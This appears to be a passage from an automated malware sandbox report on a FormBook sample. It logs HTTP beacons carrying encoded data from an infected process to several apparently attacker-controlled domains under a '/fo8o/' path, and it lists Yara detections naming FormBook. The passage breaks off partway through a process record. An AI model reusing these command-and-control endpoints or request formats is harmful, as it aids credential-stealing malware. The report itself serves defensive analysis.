                                                    Data Ascii: Jd$dU+3'9eQ(_LZ$s*Yp(7?=,`(}qq!6oc=r?;}d"~R8:zYptj,?t'Vx&+Co>pJCTp{=.=J*\Aofe.KJwd$+z(8"{F\4j*&Q@[|
                                                    Jun 9, 2024 18:03:06.869849920 CEST110INData Raw: 16 b2 55 a1 16 c7 09 9b 4e e8 07 5c c4 e3 5e 2f 1a d9 f3 b3 e0 c5 b9 b3 d3 ef ea 17 68 33 57 b2 45 21 cc ca e4 c5 5b 35 3a ae c6 e3 3d 1f 8e 85 77 39 67 64 3b f4 dd 61 a4 96 05 5d 7a 9c 31 4e e3 67 70 65 b9 24 a4 8b e7 4c e4 08 3a 41 1f 4f 4a 18
                                                    Data Ascii: UN\^/h3WE![5:=w9gd;a]z1Ngpe$L:AOJE]D.')0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    47192.168.2.1149759194.58.112.174806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:03:08.507133007 CEST1797OUTPOST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.b301.space
                                                    Origin: http://www.b301.space
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1234
                                                    Referer: http://www.b301.space/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 4e 57 66 33 62 5a 52 6f 59 45 75 4a 36 4e 6f 4e 4d 41 6b 34 62 35 64 34 71 32 7a 54 67 50 67 71 33 31 62 65 75 65 6f 4d 73 79 47 4f 4f 57 6c 4b 75 51 54 2b 76 31 4f 33 39 41 38 42 73 4e 6e 6b 6d 46 62 71 2f 4b 6b 6f 47 58 42 53 30 31 73 76 55 6f 79 56 52 68 6b 71 71 55 63 59 73 4f 78 6d 62 6f 6b 2b 4c 6a 39 57 48 71 57 75 4d 52 34 67 35 30 44 6b 54 64 44 44 6e 46 73 45 75 2f 4e 71 4e 2b 47 74 56 31 71 55 79 56 79 66 46 64 50 42 65 55 55 50 6d 5a 48 48 57 2f 46 34 35 45 30 50 42 75 2f 62 57 71 52 72 33 44 2b 66 44 78 34 49 47 33 38 4a 42 42 46 46 73 73 41 4f 2f 69 70 57 31 33 30 41 59 51 55 66 71 30 62 43 62 65 72 70 71 56 4e 76 6a 4c 36 2f 61 41 74 36 38 6b 35 52 7a 72 52 4e 57 42 56 38 35 31 35 46 6d 4e 58 4e 4c 48 56 66 75 56 6d 75 65 44 66 39 75 42 6a 2b 6e 4c 61 57 47 32 78 38 61 78 50 49 72 4e 76 70 6a 30 37 74 47 75 42 5a 33 76 67 33 42 54 65 71 76 4a 6a 50 49 43 48 42 4c 78 63 31 64 52 4f 30 6d 49 47 41 30 59 78 51 36 44 54 39 43 73 42 4b 39 7a 37 67 53 57 6c 75 6b 7a 76 44 [TRUNCATED]
                                                    Data Ascii: Zl4h1=NWf3bZRoYEuJ6NoNMAk4b5d4q2zTgPgq31beueoMsyGOOWlKuQT+v1O39A8BsNnkmFbq/KkoGXBS01svUoyVRhkqqUcYsOxmbok+Lj9WHqWuMR4g50DkTdDDnFsEu/NqN+GtV1qUyVyfFdPBeUUPmZHHW/F45E0PBu/bWqRr3D+fDx4IG38JBBFFssAO/ipW130AYQUfq0bCberpqVNvjL6/aAt68k5RzrRNWBV8515FmNXNLHVfuVmueDf9uBj+nLaWG2x8axPIrNvpj07tGuBZ3vg3BTeqvJjPICHBLxc1dRO0mIGA0YxQ6DT9CsBK9z7gSWlukzvDNdbAc9Hp4JYr3gsF8K1PJV+BLIioLUlFgXEybi/uKfL415EDpAeYztIY0Gj0FpYK0knVupK8tOdBAhl78zLcAxbyUu8+/Fr/FEGucfD4lfyeTeQdmrowe/axWROYrKkF6o2s+B/tyK59QtqDHKLNzExHgGp/rA/v/syIWZQdMzX23F+a2EzUlaTo3fuThPZoMYhHupd62I3AoRgw0p4OaJMKxh1Snd1evepyydkXmYlu1pZazz8nEpji7xCF8e6SeoLLhXzpi8Ldp/XDXTsM5RLMWI7+afoLvBIxnRVj7TlXKVPF+GUrLBDQlQaCuyMkyy5SJjzmo5dpRrejIfaiD2XF6Ab8HSSjGFTk79lMUDykZMkWHYK7tTljyzEX87LeGRgWFLx/Pu0nxfJ+HBKgAzLDJ4tkjhMbXk2vqMm0uqpUVB1oh7YGqJSrQyFY0u8JzKuVUpuxBQdu54eQAJkGZGGLtob+WpuSwS+4T+THcMZyarG3K0STBvyDVXGFBxucHNTJsA/vrOw9Hjesu7EAmMac/pc9BLlKrXpLtjuhpPPlphSXzl3svkHbBRVakU4+tNBw+TirMfCgHghC+802mp2mHzIJc/yaiaIMB/1fF+u5rcz511yBVftASslzup4YmxHZ+fwmeJENeNZZAaw2lP68FQjzKiJHmU [TRUNCATED]
                                                    Jun 9, 2024 18:03:09.400669098 CEST1236INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Sun, 09 Jun 2024 16:03:09 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Content-Encoding: gzip
                                                    Data Raw: 65 33 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b d7 11 fd ee 5f 71 cd 02 22 69 73 77 25 3b 29 6c 8b a4 e2 d8 69 bf 38 49 01 39 2d 0a c5 21 2e 97 57 e4 5a cb 5d 76 77 29 99 b1 0d 24 76 9e 88 11 23 69 80 16 41 df 45 d1 4f 05 6c d9 6a 14 3f e4 bf b0 fb 8f 7a 66 ee ee 72 49 91 b2 fc 48 1a 01 92 c8 fb 9c 3b 73 e6 cc dc 47 fd 68 c7 b7 a3 d1 40 89 5e d4 77 9b 75 fa 2b 6c 57 86 61 a3 e4 84 2d d9 91 83 c8 d9 54 25 e1 4a af db 28 05 c3 12 da 28 d9 69 d6 fb 2a 92 c2 ee c9 20 54 51 a3 f4 ce c5 5f 18 a7 50 c7 a5 9e ec ab 46 69 20 83 0d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 68 04 18 73 b2 e5 a6 a3 b6 06 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 84 21 22 27 72 55 73 6b 6b cb 6c 9f 5c 5c 32 c3 81 b4 55 dd d2 a5 75 d7 f1 36 44 a0 dc 46 29 8c 46 ae 0a 7b 4a 61 82 be ea 38 b2 51 92 ae 5b 12 bd 40 ad e7 62 b2 58 86 1c 46 be 69 87 21 06 1f f7 77 b0 80 ac f5 ba 84 44 be 67 e2 cf ca 52 49 90 e6 a0 a8 be ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 41 d4 b4 8e d5 8f ae 9d 3b 7f f6 [TRUNCATED]
                                                    Data Ascii: e30Zko_q"isw%;)li8I9-!.WZ]vw)$v#iAEOlj?zfrIH;sGh@^wu+lWa-T%J((i* TQ_PFi {(P`hs~n9MV995B[!"'rUskkl\\2Uu6DF)F{Ja8Q[@bXFi!wDgRI*A;c-[fH{c\eG4#*X.]jV:H:=TV_z#rX^CM,ORq #0Zg>\4ZNEHmQ1"Rr#v\KqqV%zgsnW#)RW0QM?w".|>w/PuAAxv&W;o(Y]rVaF%uhUVV *x/6b0}a$#fOvZkc"SCic^'}v+A3'l8Q{ai`~])Wy6,UKj3k.m&Nji)kY[=B$g/`[?l&'6.5C}RrL<x%/3G)XVQ?lJn2g2/PH5B(0K07^irS38Zp<D8oNBE5xhG3SXl*N#wxRS,}/nDo [TRUNCATED]
                                                    Jun 9, 2024 18:03:09.400770903 CEST1236INData Raw: 68 fb 74 d6 b1 f9 0b 74 ea 1a 7d f8 b0 e3 b5 5c b5 1e 19 da 9f 31 61 14 f8 5e f7 e9 46 01 f7 02 ee 36 85 ae 7f 01 bd 88 53 50 ef e3 f8 1e 70 c6 23 4c 70 eb b4 db 6a e5 84 c3 b6 36 79 2e 49 db 07 cb f5 11 19 3d 85 71 ff 8c 78 77 3f f9 0a 2e f2 38
                                                    Data Ascii: htt}\1a^F6SPp#Lpj6y.I=qxw?.8"^z7BF*[ y*[ u%at7^]9p`G5.0MN[smr'X-_V!? 3&G9_5x`j?sB| .E$3i
                                                    Jun 9, 2024 18:03:09.400814056 CEST1236INData Raw: 4a 64 b8 ff 24 b2 64 8e 03 55 e9 d8 2b f2 d4 33 85 16 27 da f3 81 98 ed b9 39 65 05 d9 51 28 a7 e0 5f 4c 5a 91 24 73 2a c0 59 70 e1 28 02 cd 91 02 83 c3 1f 81 37 3f e3 10 8f 3d 2c 83 1c f2 1c 15 f1 b7 dc 0d 60 d6 f9 05 28 bb 86 7d 71 be 71 a6 a4
                                                    Data Ascii: Jd$dU+3'9eQ(_LZ$s*Yp(7?=,`(}qq!6oc=r?;}d"~R8:zYptj,?t'Vx&+Co>pJCTp{=.=J*\Aofe.KJwd$+z(8"{F\4j*&Q@[|
                                                    Jun 9, 2024 18:03:09.400852919 CEST110INData Raw: 16 b2 55 a1 16 c7 09 9b 4e e8 07 5c c4 e3 5e 2f 1a d9 f3 b3 e0 c5 b9 b3 d3 ef ea 17 68 33 57 b2 45 21 cc ca e4 c5 5b 35 3a ae c6 e3 3d 1f 8e 85 77 39 67 64 3b f4 dd 61 a4 96 05 5d 7a 9c 31 4e e3 67 70 65 b9 24 a4 8b e7 4c e4 08 3a 41 1f 4f 4a 18
                                                    Data Ascii: UN\^/h3WE![5:=w9gd;a]z1Ngpe$L:AOJE]D.')0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    48192.168.2.1149760194.58.112.174806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:03:11.051254988 CEST502OUTGET /fo8o/?Zl4h1=AU3XYvZFaGSlytwuLg8MPaUQqx3yoZo+slWhncsJrkz7OmZN7i/xsh6l91syvPfChHr514cSZiYi12sQUpLBck89gksl+IJQQsBNVEJ3Y46WCh4jtmLfecQ=&Pbw=PLVXbnG85 HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Host: www.b301.space
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Jun 9, 2024 18:03:11.949306965 CEST1236INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Sun, 09 Jun 2024 16:03:11 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Data Raw: 32 39 32 37 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 62 33 30 31 2e 73 70 61 63 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 [TRUNCATED]
                                                    Data Ascii: 2927<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.b301.space</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://reg.ru" re [TRUNCATED]
                                                    Jun 9, 2024 18:03:11.949342012 CEST212INData Raw: 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65
                                                    Data Ascii: class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.b301.space</h1><p c
                                                    Jun 9, 2024 18:03:11.949398994 CEST1236INData Raw: 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 64 65 73 63 72 69 70 74 69 6f 6e 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d1 80 d0 b8 d1 80 d0 be d0 b2 d0
                                                    Data Ascii: lass="b-parking__header-description b-text"> <br>&nbsp; &nbsp;.</p><div class="b-parking__buttons-wrapper"><a class="b-button b-button_color_reference b-button_size_no
                                                    Jun 9, 2024 18:03:11.949479103 CEST1236INData Raw: 61 67 65 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 22 3e 3c 2f 73 70 61 6e 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 2d 6d 61 72 67 69 6e 5f 6c 65 66 74 2d 6c 61 72 67 65 22 3e 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 62 2d 74 69 74 6c 65 20 62
                                                    Data Ascii: age_type_hosting"></span><div class="l-margin_left-large"><strong class="b-title b-title_size_large-compact"></strong><p class="b-text b-parking__promo-subtitle l-margin_bottom-none"> &nbsp;</p></d
                                                    Jun 9, 2024 18:03:11.949497938 CEST1236INData Raw: 65 67 2e 72 75 2f 68 6f 73 74 69 6e 67 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 77 77 77 2e 62 33 30 31 2e 73 70 61 63 65 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 70 61 72 6b 69 6e 67 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 73 5f 6c 61 6e 64 5f 68 6f
                                                    Data Ascii: eg.ru/hosting/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_host&amp;reg_source=parking_auto"> </a><p class="b-price b-parking__price"> <b class="b-price__amount">83&nbsp;<span class="char-ro
                                                    Jun 9, 2024 18:03:11.949512959 CEST1236INData Raw: 6e 62 73 70 3b 43 4d 53 3c 2f 73 74 72 6f 6e 67 3e 3c 70 20 63 6c 61 73 73 3d 22 62 2d 74 65 78 74 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 64 65 73 63 72 69 70 74 69 6f 6e 22 3e d0 98 d1 81 d0 bf d0 be d0 bb d1 8c d0 b7 d1 83 d0 b9
                                                    Data Ascii: nbsp;CMS</strong><p class="b-text b-parking__promo-description"> &nbsp;CMS &nbsp; &nbsp;
                                                    Jun 9, 2024 18:03:11.949529886 CEST1236INData Raw: 6e 64 5f 62 75 69 6c 64 26 61 6d 70 3b 72 65 67 5f 73 6f 75 72 63 65 3d 70 61 72 6b 69 6e 67 5f 61 75 74 6f 22 3e d0 97 d0 b0 d0 ba d0 b0 d0 b7 d0 b0 d1 82 d1 8c 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b
                                                    Data Ascii: nd_build&amp;reg_source=parking_auto"></a></div><div class="b-parking__promo-item b-parking__ssl-protection"><span class="b-parking__promo-image b-parking__promo-image_type_ssl l-margin_right-large"></span> <strong class="b-tit
                                                    Jun 9, 2024 18:03:11.949546099 CEST1236INData Raw: d0 be d0 ba d0 b0 d0 b7 d0 b0 d1 82 d0 b5 d0 bb d0 b8 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 61 72 74 69 63 6c 65 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61
                                                    Data Ascii: .</p></div></div></article><script onload="window.trackScriptLoad('parking-rdap-auto.js')" onerror="window.trackScriptLoad('parking-rdap-auto.js', 1)" src="parking-rdap-auto.js" charset="utf-8"></script><script>function ondat
                                                    Jun 9, 2024 18:03:11.949561119 CEST1236INData Raw: 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 20 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 73 70 61 6e 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 20 27 73 70 61 6e 2e 70 75 6e 79 2c 20 73 70 61 6e 2e
                                                    Data Ascii: rySelectorAll ) { var spans = document.querySelectorAll( 'span.puny, span.no-puny' ), t = 'textContent' in document.body ? 'textContent' : 'innerText'; var domainName = document.title.match( /(xn--|[0-9]).+\.(xn--)
                                                    Jun 9, 2024 18:03:11.949577093 CEST598INData Raw: 74 69 6f 6e 28 6d 2c 65 2c 74 2c 72 2c 69 2c 6b 2c 61 29 7b 6d 5b 69 5d 3d 6d 5b 69 5d 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 28 6d 5b 69 5d 2e 61 3d 6d 5b 69 5d 2e 61 7c 7c 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 7d 3b 0a 20 20
                                                    Data Ascii: tion(m,e,t,r,i,k,a){m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)}; m[i].l=1*new Date();k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)}) (window, document, "script", "ht


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    49192.168.2.1149761154.215.72.110806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:03:20.161528111 CEST506OUTGET /fo8o/?Zl4h1=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KAVMa+YMk7oXS5ptBuz0n8hBJ8/Hksw4c=&Pbw=PLVXbnG85 HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Host: www.3xfootball.com
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Jun 9, 2024 18:03:21.290488958 CEST691INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Sun, 09 Jun 2024 16:03:21 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 548
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    50192.168.2.1149762202.172.28.20280
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:03:27.673625946 CEST779OUTPOST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.kasegitai.tokyo
                                                    Origin: http://www.kasegitai.tokyo
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 202
                                                    Referer: http://www.kasegitai.tokyo/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 4a 5a 76 70 77 56 49 68 75 42 43 58 53 48 62 6c 32 71 6c 5a 2b 79 49 57 5a 2b 61 46 2f 2f 42 72 6b 77 51 5a 6d 6c 71 64 38 54 35 32 76 54 57 45 67 77 41 56 68 42 38 69 6e 33 6f 45 74 35 2f 53 55 34 79 6d 76 43 4e 39 73 66 79 73 79 67 68 45 77 5a 4f 31 47 62 49 4d 4c 67 45 53 42 69 78 58 65 77 45 46 2f 33 64 62 2b 4f 4f 6c 58 45 70 6a 39 6f 58 75 59 57 54 43 67 42 68 32 50 37 39 7a 47 73 76 43 58 68 7a 62 50 30 42 39 74 70 48 4a 50 4e 6d 66 65 32 4f 76 2f 78 70 73 6d 4c 4d 41 46 48 55 74 45 6a 32 6f 50 6a 43 64 33 45 42 51 62 2f 41 4c 52 41 3d 3d
                                                    Data Ascii: Zl4h1=5JlKLzaKVp1wJZvpwVIhuBCXSHbl2qlZ+yIWZ+aF//BrkwQZmlqd8T52vTWEgwAVhB8in3oEt5/SU4ymvCN9sfysyghEwZO1GbIMLgESBixXewEF/3db+OOlXEpj9oXuYWTCgBh2P79zGsvCXhzbP0B9tpHJPNmfe2Ov/xpsmLMAFHUtEj2oPjCd3EBQb/ALRA==
                                                    Jun 9, 2024 18:03:28.549520969 CEST360INHTTP/1.1 404 Not Found
                                                    Date: Sun, 09 Jun 2024 16:03:28 GMT
                                                    Server: Apache
                                                    Content-Length: 196
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:11:59:18
                                                    Start date:09/06/2024
                                                    Path:C:\Users\user\Desktop\opp46lGmxd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\opp46lGmxd.exe"
                                                    Imagebase:0xa60000
                                                    File size:1'161'728 bytes
                                                    MD5 hash:0F399D1B3A7C6DD28867095C2BDB2098
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:2
                                                    Start time:11:59:19
                                                    Start date:09/06/2024
                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\opp46lGmxd.exe"
                                                    Imagebase:0x560000
                                                    File size:46'504 bytes
                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1536824368.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1536824368.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1536423830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1536423830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1537312165.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1537312165.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:3
                                                    Start time:11:59:27
                                                    Start date:09/06/2024
                                                    Path:C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Wow64 process (32bit):true
